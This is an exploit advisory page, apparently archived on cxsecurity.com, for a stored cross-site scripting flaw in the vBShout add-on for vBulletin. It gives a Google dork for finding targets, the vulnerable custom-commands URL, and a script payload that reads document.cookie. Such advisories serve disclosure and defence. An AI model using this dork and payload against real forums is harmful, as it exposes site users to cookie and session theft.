vBShout vBulletin Stored XSS Vulnerability

2013.07.10
Credit: []0iZy5
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

########################################################################################## # # Exploit Title: vBShout vBulletin - Stored XSS Vulnerability # Google Dork: intext:vBShout # Date: 10.07.2013 # Exploit Author: []0iZy5 # Vendor Homepage: www.backtrack-linux.ro # Software Link: http://www.dragonbyte-tech.com/vbecommerce.php?do=product&productid=2 # Version: vBulletin 3.8.x, vBulletin 4.x.x, vBulletin 5.x.x # Tested on: Linux & Windows # ########################################################################################## # # Stage 1: Go to -> UserCP -> Custom Commands # (Direct Link:) http://127.0.0.1/[path]/vbshout.php?do=profile&action=customcommands # # Stage 2: Add a malicious hash tag. # (Example:) "><script>alert(document.cookie)</script> # ########################################################################################## # # This was written for educational purpose only. use it at your own risk. # Author will be not responsible for any damage caused! user assumes all responsibility. # Intended for authorized web application pentesting only! # ##########################################################################################

References:

http://www.dragonbyte-tech.com/vbecommerce.php?do=product&productid=2


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top